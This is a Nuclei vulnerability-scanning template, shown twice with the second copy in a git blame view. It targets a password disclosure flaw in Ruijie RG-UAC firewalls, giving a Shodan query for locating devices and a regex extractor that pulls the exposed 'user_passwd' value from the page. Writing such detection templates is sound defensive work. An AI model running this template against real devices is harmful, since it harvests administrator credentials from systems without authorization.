nuclei-templates/vulnerabilities/ruijie/ruijie-password-leak.yaml

id: ruijie-password-leak

info:
  name: RG-UAC Ruijie Password Leak
  author: ritikchaddha
  severity: high
  description: Security Notice of Information Disclosure Vulnerability in Multiple Firewall Devices
  reference:
    - https://forum.butian.net/share/177
  metadata:
    shodan-query: http.html:"Get_Verify_Info"
  tags: password,leak,ruijie,exposure,firewall,router

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'user_passwd\/\*"([a-z0-9]+)"\*\/\);'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'user_passwd\/\*"([a-z0-9]+)"\*\/\);'
Update and rename firewall-password-leak.yaml to ruijie-password-leak.yaml 2022-05-06 15:29:15 +00:00			`id: ruijie-password-leak`
Create firewall-password-leak.yaml 2022-05-06 10:40:24 +00:00
			`info:`
Update and rename firewall-password-leak.yaml to ruijie-password-leak.yaml 2022-05-06 15:29:15 +00:00			`name: RG-UAC Ruijie Password Leak`
Create firewall-password-leak.yaml 2022-05-06 10:40:24 +00:00			`author: ritikchaddha`
			`severity: high`
			`description: Security Notice of Information Disclosure Vulnerability in Multiple Firewall Devices`
			`reference:`
			`- https://forum.butian.net/share/177`
Update and rename firewall-password-leak.yaml to ruijie-password-leak.yaml 2022-05-06 15:29:15 +00:00			`metadata:`
			`shodan-query: http.html:"Get_Verify_Info"`
			`tags: password,leak,ruijie,exposure,firewall,router`
Create firewall-password-leak.yaml 2022-05-06 10:40:24 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update and rename firewall-password-leak.yaml to ruijie-password-leak.yaml 2022-05-06 15:29:15 +00:00			`- "{{BaseURL}}"`
Create firewall-password-leak.yaml 2022-05-06 10:40:24 +00:00
			`matchers-condition: and`
			`matchers:`
Update and rename vulnerabilities/other/ruijie-password-leak.yaml to vulnerabilities/other/ruijie/ruijie-password-leak.yaml 2022-05-06 15:37:45 +00:00			`- type: regex`
			`regex:`
			`- 'user_passwd\/\"([a-z0-9]+)"\\/\);'`
Update and rename firewall-password-leak.yaml to ruijie-password-leak.yaml 2022-05-06 15:29:15 +00:00
			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
Create firewall-password-leak.yaml 2022-05-06 10:40:24 +00:00			`part: body`
Update and rename firewall-password-leak.yaml to ruijie-password-leak.yaml 2022-05-06 15:29:15 +00:00			`group: 1`
			`regex:`
			`- 'user_passwd\/\"([a-z0-9]+)"\\/\);'`